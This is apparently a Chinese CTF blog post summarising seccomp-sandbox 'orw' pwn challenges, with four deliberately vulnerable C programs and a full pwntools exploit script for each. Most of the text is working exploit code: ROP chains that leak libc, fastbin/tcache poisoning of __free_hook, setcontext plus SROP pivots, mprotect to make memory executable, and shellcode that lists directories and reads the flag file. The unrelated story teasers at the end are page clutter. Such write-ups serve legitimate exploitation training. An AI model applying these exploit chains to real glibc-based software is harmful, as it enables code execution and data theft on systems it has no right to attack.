pwn sandbox/orw总结

例题1 good(栈沙盒)

#include<stdio.h>
#include<fcntl.h>
#include<unistd.h>
#include<stddef.h>
#include<linux/seccomp.h>
#include<linux/filter.h>
#include<sys/prctl.h>    
#include<linux/bpf.h> 
#include<sys/types.h>



void init()
{
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);

}
void sandbox(){
        struct sock_filter filter[] = {
        BPF_STMT(BPF_LD+BPF_W+BPF_ABS,4),
        BPF_JUMP(BPF_JMP+BPF_JEQ,0xc000003e,0,2),
        BPF_STMT(BPF_LD+BPF_W+BPF_ABS,0),
        BPF_JUMP(BPF_JMP+BPF_JEQ,59,0,1),
        BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_KILL),
        BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ALLOW),
        };
        struct sock_fprog prog = {
        .len = (unsigned short)(sizeof(filter)/sizeof(filter[0])),
        .filter = filter,
        };
        prctl(PR_SET_NO_NEW_PRIVS,1,0,0,0);
        prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&prog);
}
void main()
{
    init();
    sandbox();
    char buf[0x48];
    printf("%s\n","Today is a good day no right man?");
    read(0,buf,0x100);
}

思路

编译指令gcc -fno-stack-protector -no-pie -o sandbox sandbox.c
使用方法 seccomp-tools dump ./xxx

EXP

from pwn import *
r=process('./good')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf=ELF('./good')
context.log_level='debug'
'''
0x000000000040083c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040083e : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400840 : pop r14 ; pop r15 ; ret
0x0000000000400842 : pop r15 ; ret
0x000000000040083b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040083f : pop rbp ; pop r14 ; pop r15 ; ret
0x00000000004005f8 : pop rbp ; ret
0x0000000000400843 : pop rdi ; ret
0x0000000000400841 : pop rsi ; pop r15 ; ret 
0x000000000040083d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040053e : ret
0x0000000000400542 : ret 0x200a
0x0000000000400778 : ret 0x2be


'''
rdi=0x0000000000400843
rsi=0x0000000000400841
r.recv()
#puts(puts_got)
pay='a'*0x58+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x0400790)
r.sendline(pay)
leak=u64(r.recv(6)+'\x00'*2)
print(hex(leak))
libc_base=leak-libc.sym['puts']
print(hex(libc_base))
r.recv()
pay3='a'*0x58+p64(rdi)+p64(0)+p64(rsi)+p64(0x601200)+p64(0x40)+p64(libc_base+libc.sym['read'])+p64(0x0400790)
r.send(pay3)
r.send('flag')

r.recv()
pay1='a'*0x58+p64(rdi)+p64(0x2)+p64(rsi)+p64(0x601200)+p64(0)+p64(libc_base+libc.sym['syscall'])
pay1+=p64(rdi)+p64(3)+p64(rsi)+p64(0x601200)+p64(0x100)+p64(libc_base+libc.sym['read'])
pay1+=p64(rdi)+p64(0x601200)+p64(libc_base+libc.sym['puts'])+p64(0x0400790)
r.send(pay1)
print(r.recvuntil("}"))

例题2 orwheap(2.27/堆沙盒)

#include<stdio.h>
#include <math.h>
#include <stdio.h>
#include<unistd.h>
#include <dirent.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
void sandbox(){
    struct sock_filter filter[] = {
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS,4),
    BPF_JUMP(BPF_JMP+BPF_JEQ,0xc000003e,0,2),
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS,0),
    BPF_JUMP(BPF_JMP+BPF_JEQ,59,0,1),
    BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_KILL),
    BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = {
    .len = (unsigned short)(sizeof(filter)/sizeof(filter[0])),
    .filter = filter,
    };
    prctl(PR_SET_NO_NEW_PRIVS,1,0,0,0);
    prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&prog);
}
int init()
{
    setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  return setvbuf(stderr, 0LL, 2, 0LL);
}
int num=0;
char *heaparray[0x10];
size_t realsize[0x10];
void create(){
    if(num>=0x20)
    {
        puts("no more");
        return;
    }
    int size;
    puts("Size of Heap : ");
    scanf("%d",&size);
    heaparray[num]=(char *)malloc(size);
    realsize[num]=size;
    num++;
   
    }
void show(){
    int idx ;
    char buf[4];
    printf("Index :\n");
    read(0,buf,4);//输入堆块的index
    idx = atoi(buf);
    if(idx < 0 || idx >= 0x10){
        puts("Out of bound!");
        _exit(0);
    }
    if(heaparray[idx]){//根据序列进行查找
        //打印指定堆块内容
        printf("Size : %ld\nContent : %s\n",realsize[idx],heaparray[idx]);
        puts("Done !");
    }else{
        puts("No such heap !");
    }
}
void edit(){
    int idx ;
    char buf[4];
    printf("Index :\n");
    read(0,buf,4);//输入堆的序列号
    idx = atoi(buf);
    if(idx < 0 || idx >= 0x10){//判断序列号的正确性
        puts("Out of bound!");
        _exit(0);
    }
  //若序列号正确
    if(heaparray[idx]){
        int size;
    puts("Size of Heap : ");
    scanf("%d",&size);
        printf("Content of heap : \n");
        read(0,heaparray[idx],size);
    //调用read_input函数输入堆的内容
        puts("Done !");
    }else{
        puts("No such heap !");
    }
}
void dele(){
    int idx ;
    char buf[4];
    printf("Index :\n");
    read(0,buf,4);//输入index
    idx = atoi(buf);
    if(idx < 0 || idx >= 0x10){//判断堆块序列的合法性
        puts("Out of bound!");
        _exit(0);
    }
    if(heaparray[idx]){
        free(heaparray[idx]);//free heaparray[idx]指针
        realsize[idx] = 0 ;
        heaparray[idx]=NULL;
        puts("Done !"); 
        num--;
    }else{
        puts("No such heap !");
    }
}
void menu(void){
    puts("1.create");
    puts("2.dele");
    puts("3.edit");
    puts("4.show");
}
void main()
{
    init();
    sandbox();
    int choice;
    while(1)
    {
        menu();
        scanf("%d",&choice);
        switch(choice)
        {
            case 1:create();break;
            case 2:dele();break;
            case 3:edit();break;
            case 4:show();break;
            default:puts("error");
        }
    }
}

思路

edit任意大小修改
2.27使用的是setcontext+53,是利用rdi赋值
抓着free_hook写setcontext

EXP

from pwn import *
r=process('./orwheap18')
elf = ELF("orwheap18")
libc= elf.libc
# context.log_level='debug'
context.arch="amd64"
def add(size):
    r.sendlineafter("4.show\n",'1')
    r.sendlineafter("Size of Heap : \n",str(size))

def dele(idx):
    r.sendlineafter("4.show\n",'2')
    r.sendlineafter("Index :\n",str(idx))

def edit(idx,size,con):
    r.sendlineafter("4.show\n",'3')
    r.sendlineafter("Index :\n",str(idx))
    r.sendlineafter("Size of Heap : \n",str(size))
    r.sendafter("Content of heap : \n",con)
def show(idx):
    r.sendlineafter("4.show\n",'4')
    r.sendlineafter("Index :\n",str(idx))
def dbg():
    gdb.attach(r)
    pause() 
# size>0x420不进入tcache
add(0x420)#0
add(0x420)#1
dele(0)
add(0x90)
# 泄露libc
show(1)
r.recvuntil("Content : ")
base=u64(r.recv(6)+b'\x00'*2)-0x3ec090
print(hex(base))
for i in range(9):
    add(0x18)
dele(10)
dele(9)
dele(8)
dele(7)
dele(6)
dele(5)
dele(4)
dele(3)
free_hook=base+libc.sym['__free_hook']
# fastbin里修改fd
edit(2,0x666,b'a'*0x18+p64(0x21)+p64(free_hook-0x10))
for i in range(9):
    add(0x18)
setcontext= base + libc.symbols['setcontext']+53
syscall= base+next(libc.search(asm("syscall\nret")))
edit(11,0x100,p64(setcontext))# 修改free_hook

# 在freehook上方构造
# 设置好srop
fake_rsp = free_hook&0xfffffffffffff000
print(hex(fake_rsp))
frame = SigreturnFrame()
frame.rax=0
frame.rdi=0
frame.rsi=fake_rsp
frame.rdx=0x2000
frame.rsp=fake_rsp
frame.rip=syscall
add(0x500)
edit(12,0x500,str(frame))

# 使用free触发,通过setcontext先到rip执行read,然后ret到rsp的值(也就是我们写入的内容)
dele(12)
prdi_ret = base+libc.search(asm("pop rdi\nret")).next()
prsi_ret = base+libc.search(asm("pop rsi\nret")).next()
prdx_ret = base+libc.search(asm("pop rdx\nret")).next()
prax_ret = base+libc.search(asm("pop rax\nret")).next()
jmp_rsp = base+libc.search(asm("jmp rsp")).next()
print("jmp"+hex(jmp_rsp))
mprotect_addr = base + libc.sym['mprotect']

# 这段payload是去查目录确定flag的名称
payload = p64(prdi_ret)+p64(fake_rsp)
payload += p64(prsi_ret)+p64(0x1000)
payload += p64(prdx_ret)+p64(7)
payload += p64(prax_ret)+p64(10)
payload += p64(syscall) #mprotect(fake_rsp,0x1000,7)修改fake_rsp-fake_rsp+0x1000权限
payload += p64(jmp_rsp)# 执行shellcraft
payload += asm(shellcraft.open('./'))
payload += asm(shellcraft.getdents64(3,fake_rsp+0x300,0x100))
payload += asm(shellcraft.write(1,fake_rsp+0x300,0x100))
payload += asm('''
        mov rdi, 0; mov rsi, 0x%x;mov rdx, 0x100;mov rax, 0; syscall; push rsi; ret;
        ''' % (fake_rsp+0x100))# 寄存器赋值,执行read,ret到写入位置执行
r.send(payload)
r.recvuntil("flag")
name=r.recv(6)
print("name"+hex(name))
flag='flag'+name
r.recv()

# cat flag
shellcode = asm(shellcraft.cat(flag))
shellcode+= asm('''
        mov rdi, 0; mov rsi, 0x%x;mov rdx, 0x100;mov rax, 0; syscall; push rsi; ret;
        ''' % (fake_rsp+0x100))
r.send(shellcode)
print(r.recvuntil("}"))
r.interactive()

例题3 orwheap20(2.29/2.31堆沙盒)

#include<stdio.h>
#include <math.h>
#include <stdio.h>
#include<unistd.h>
#include <dirent.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
void sandbox(){
    struct sock_filter filter[] = {
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS,4),
    BPF_JUMP(BPF_JMP+BPF_JEQ,0xc000003e,0,2),
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS,0),
    BPF_JUMP(BPF_JMP+BPF_JEQ,59,0,1),
    BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_KILL),
    BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = {
    .len = (unsigned short)(sizeof(filter)/sizeof(filter[0])),
    .filter = filter,
    };
    prctl(PR_SET_NO_NEW_PRIVS,1,0,0,0);
    prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&prog);
}
int init()
{
    setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  return setvbuf(stderr, 0LL, 2, 0LL);
}
int num=0;
char *heaparray[0x10];
size_t realsize[0x10];
void create(){
    if(num>=0x20)
    {
        puts("no more");
        return;
    }
    int size;
    puts("Size of Heap : ");
    scanf("%d",&size);
    heaparray[num]=(char *)malloc(size);
    realsize[num]=size;
    num++;
   
    }
void show(){
    int idx ;
    char buf[4];
    printf("Index :\n");
    read(0,buf,4);//输入堆块的index
    idx = atoi(buf);
    if(idx < 0 || idx >= 0x10){
        puts("Out of bound!");
        _exit(0);
    }
    if(heaparray[idx]){//根据序列进行查找
        //打印指定堆块内容
        printf("Size : %ld\nContent : %s\n",realsize[idx],heaparray[idx]);
        puts("Done !");
    }else{
        puts("No such heap !");
    }
}
void edit(){
    int idx ;
    char buf[4];
    printf("Index :\n");
    read(0,buf,4);//输入堆的序列号
    idx = atoi(buf);
    if(idx < 0 || idx >= 0x10){//判断序列号的正确性
        puts("Out of bound!");
        _exit(0);
    }
  //若序列号正确
    if(heaparray[idx]){
        int size;
    puts("Size of Heap : ");
    scanf("%d",&size);
        printf("Content of heap : \n");
        read(0,heaparray[idx],size);
    //调用read_input函数输入堆的内容
        puts("Done !");
    }else{
        puts("No such heap !");
    }
}
void dele(){
    int idx ;
    char buf[4];
    printf("Index :\n");
    read(0,buf,4);//输入index
    idx = atoi(buf);
    if(idx < 0 || idx >= 0x10){//判断堆块序列的合法性
        puts("Out of bound!");
        _exit(0);
    }
    if(heaparray[idx]){
        free(heaparray[idx]);//free heaparray[idx]指针
        realsize[idx] = 0 ;
        heaparray[idx]=NULL;
        puts("Done !"); 
        num--;
    }else{
        puts("No such heap !");
    }
}
void menu(void){
    puts("1.create");
    puts("2.dele");
    puts("3.edit");
    puts("4.show");
}
void main()
{
    init();
    sandbox();
    int choice;
    while(1)
    {
        menu();
        scanf("%d",&choice);
        switch(choice)
        {
            case 1:create();break;
            case 2:dele();break;
            case 3:edit();break;
            case 4:show();break;
            default:puts("error");
        }
    }
}

思路

和2.27类似,但setcontext+61采用rdx传参,所以要借助一个gadget,结构有所变化

EXP

from pwn import *
r=process('overheap20')
elf = ELF("overheap20")
libc = elf.libc
context.log_level='debug'
context.arch="amd64"

#0x0000000000154930: mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20]; 
def add(size):
    r.sendlineafter("4.show\n",'1')
    r.sendlineafter("Size of Heap : \n",str(size))

def dele(idx):
    r.sendlineafter("4.show\n",'2')
    r.sendlineafter("Index :\n",str(idx))

def edit(idx,size,con):
    r.sendlineafter("4.show\n",'3')
    r.sendlineafter("Index :\n",str(idx))
    r.sendlineafter("Size of Heap : \n",str(size))
    r.sendafter("Content of heap : \n",con)
def show(idx):
    r.sendlineafter("4.show\n",'4')
    r.sendlineafter("Index :\n",str(idx))
def dbg():
    gdb.attach(r)
    pause()

add(0x420)
add(0x420)
dele(0)
add(0x90)

show(1)
r.recvuntil("Content : ")
base=u64(r.recv(6)+b'\x00'*2)-0x1ebfd0
prdi_ret = base+libc.search(asm("pop rdi\nret")).next()
prsi_ret = base+libc.search(asm("pop rsi\nret")).next()
prdx_ret = base+libc.search(asm("pop rdx\nret")).next()
prax_ret = base+libc.search(asm("pop rax\nret")).next()
jmp_rsp = base+libc.search(asm("jmp rsp")).next()
mprotect_addr = base + libc.sym['mprotect']
print(hex(base))
for i in range(9):
    add(0x18)
dele(10)
dele(9)
dele(8)
dele(7)
dele(6)
dele(5)
dele(4)
dele(3)
free_hook=base+libc.sym['__free_hook']
edit(2,0x666,b'a'*0x18+p64(0x21)+p64(free_hook-0x10))
for i in range(9):
    add(0x18)
# 在此之前,都是为了申请到freehook位置的空间

setcontext= base + libc.symbols['setcontext']+61
syscall= base+next(libc.search(asm("syscall\nret")))
fake_rsp = (free_hook&0xfffffffffffff000)
print(hex(fake_rsp))
shell1 = '''
    xor rdi,rdi
    mov rsi,%d
    mov edx,0x1000

    mov eax,0
    syscall

    jmp rsi
    ''' % fake_rsp
frame = SigreturnFrame()# 设置srop 结合setcontext,先rip跳转mprotect,然后ret跳转rsp
frame.rsp = base + libc.sym['__free_hook']+0x10
frame.rdi = fake_rsp
frame.rsi = 0x1000
frame.rdx = 7
frame.rip = base + libc.sym['mprotect']

# 这里开始泄露堆地址,因为是从tcachebin里申请回来的
show(3)
r.recvuntil("Content : ")
frame_addr=u64(r.recv(6)+b'\x00'*2)+0x770# 加到后边写入的位置
print(hex(frame_addr))

# 把free_hook改为gadget,同时布局上下文
rdxx=0x0000000000154930+base 
edit(11,0x300,p64(rdxx)+p64(0)+p64(base+libc.sym["__free_hook"]+0x18)+asm(shell1))
#0x0000000000154930: mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
# gadget:先为rdx赋值(srop),然后retsetcontext函数
# 执行完srop->ret freehook+0x10(freehook+0x18)->asm(read)
payload1 = p64(0)+p64(frame_addr)#rdx = rdi+0x8
payload1 += p64(0)*4+p64(base+libc.sym["setcontext"]+61) + str(frame)[0x28:]# 前0x28是空的

add(0x500)
edit(12,0x500,payload1)
dele(12)

# 跑目录,catflag
payload=""
payload += asm(shellcraft.open('./'))
payload += asm(shellcraft.getdents64(3,fake_rsp+0x300,0x100))
payload += asm(shellcraft.write(1,fake_rsp+0x300,0x100))
payload += asm('''
        mov rdi, 0; mov rsi, 0x%x;mov rdx, 0x100;mov rax, 0; syscall; push rsi; ret;
        ''' % (fake_rsp+0x100))
r.send(payload)
r.recvuntil("flag")
name=r.recv(6)
flag='flag'+name
shellcode = asm(shellcraft.cat(flag))
shellcode+= asm('''
        mov rdi, 0; mov rsi, 0x%x;mov rdx, 0x100;mov rax, 0; syscall; push rsi; ret;
        ''' % (fake_rsp+0x100))
r.send(shellcode)

r.interactive()

例题4 oldfashion_orw(栈沙盒)

image.png

泄露libc,改权限,bss上写入shellcode,运行后拿目录,然后重复一次orw拿flag,基本上改完权限就跑板子了,和上一道的区别就是改了权限用shellcode吧

EXP

from pwn import *
context.log_level = 'debug'
context.arch='amd64'

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

p = process("vuln")
elf = ELF('vuln')
libc = elf.libc
'''
0x0000000000401443: pop rdi; ret; 
0x0000000000401441: pop rsi; pop r15; ret;
0x000000000011c371: pop rdx; pop r12; ret; 
0x000000000040101a: ret;

'''
pop_rdi = 0x0000000000401443
pop_rsi_r15 = 0x0000000000401441
ret = 0x000000000040101a
main = 0x401311
bss = 0x404000
payload = 'a'*0x38+p64(pop_rdi)+p64(1)
payload += p64(pop_rsi_r15)+p64(elf.got['write'])+p64(0)
payload += p64(elf.plt['write'])+p64(main)
p.recv()
p.sendline('-1')
p.recv()
p.send(payload)
# p.sendlineafter('size?\n','-1') 
# p.sendafter('content?\n',payload)
ru('!\n')
libc_base = u64(p.recv(6)+'\x00'*2)-libc.sym['write']
lg('libc_base',libc_base)
pop_rdx_r12 = libc_base+0x000000000011c371
payload = 'a'*0x38+p64(pop_rdi)+p64(bss)
payload += p64(pop_rsi_r15)+p64(0x1000)+p64(0)
payload += p64(pop_rdx_r12)+p64(7)+p64(0)+p64(libc_base+libc.sym['mprotect'])
payload += p64(0x401311)

p.recv()
p.sendline('-1')
p.recv()
p.send(payload)
# p.sendlineafter('size?\n','-1') 
# p.sendafter('content?\n',payload)
poc = b'a'*0x38
poc += p64(pop_rdi)
poc += p64(0)
poc += p64(pop_rsi_r15)
poc += p64(bss+0x200)+p64(0)
poc += p64(pop_rdx_r12)
poc += p64(0x100)+p64(0)
poc += p64(libc_base+libc.sym['read'])
poc += p64(bss+0x200)

p.recv()
p.sendline('-1')
p.recv()
p.send(poc)
p.recv()
shellcode = b''
shellcode += asm(shellcraft.open('./'))
shellcode += asm(shellcraft.getdents64(3, bss+0x300, 0x100))
shellcode += asm(shellcraft.write(1,bss+0x300, 0x100))
shellcode += asm('''
        mov rdi, 0; mov rsi, 0x%x;mov rdx, 0x100;mov rax, 0; syscall; push rsi; ret;
        ''' % (0x401311))
p.send(shellcode)
flag=p.recvuntil("flag")
flagname=b'flag'+p.recv(20)
print((flagname))

poc=b'a'*0x38
poc += p64(pop_rdi)
poc += p64(0)
poc += p64(pop_rsi_r15)
poc += p64(bss+0x600)+p64(0)
poc += p64(pop_rdx_r12)
poc += p64(0x100)+p64(0)
poc += p64(libc_base+libc.sym['read'])
poc += p64(bss+0x600)
p.recv()
p.sendline('-1')
p.recv()
p.send(poc)
p.recv()
shellcode = b''
shellcode += asm(shellcraft.open((flagname)))
shellcode += asm(shellcraft.read(4, bss+0x700, 0x400))
shellcode += asm(shellcraft.write(1,bss+0x700, 0x400))
shellcode += asm('''
        mov rdi, 0; mov rsi, 0x%x;mov rdx, 0x100;mov rax, 0; syscall; push rsi; ret;
        ''' % (0x401311))
p.send(shellcode)
p.interactive()
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 人面猴
    序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 217,826评论 6 506
  • 死咒
    序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,968评论 3 395
  • 救了他两次的神仙让他今天三更去死
    文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 164,234评论 0 354
  • 道士缉凶录:失踪的卖姜人
    文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,562评论 1 293
  • 港岛之恋(遗憾婚礼)
    正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,611评论 6 392
  • 恶毒庶女顶嫁案:这布局不是一般人想出来的
    文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,482评论 1 302
  • 城市分裂传说
    那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,271评论 3 418
  • 双鸳鸯连环套:你想象不到人心有多黑
    文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 39,166评论 0 276
  • 万荣杀人案实录
    序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,608评论 1 314
  • 护林员之死
    正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,814评论 3 336
  • 白月光启示录
    正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,926评论 1 348
  • 活死人
    序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,644评论 5 346
  • 日本核电站爆炸内幕
    正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,249评论 3 329
  • 男人毒药:我在死后第九天来索命
    文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,866评论 0 22
  • 一桩弑父案,背后竟有这般阴谋
    文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,991评论 1 269
  • 情欲美人皮
    我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 48,063评论 3 370
  • 代替公主和亲
    正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,871评论 2 354

推荐阅读更多精彩内容

  • CTF-Pwn-7月记录
    07.19 CTF特训营---REVERSE阅读P208——P 1、X86指令体系 寄存器组 汇编指令集:Inte...
    gufsicsxzf阅读 1,479评论 0 0
  • pwn write_up 合集
    一、bugkuctf pwn4(栈,ROP,system($0)) 图1很容易看出来read函数栈溢出 紧接着就是...
    ywledoc阅读 1,604评论 0 1
  • 32c3 sandbox
    Tags: /proc/self/mem,seccomp,shellcode 前言 做 seccomp 相关题目遇...
    pu1p阅读 371评论 0 3
  • pwnable.tw wp
    start 分析: ret2shellcode 流程:传入shellcode 并且执行 要点: 1.得到溢出,劫持...
    fantasy_learner阅读 784评论 0 0
  • pwn-100
    先使用checksec查看文件属性 RELRO会有Partial RELRO和FULL RELRO,如果开启FUL...
    呼噜84阅读 1,008评论 0 2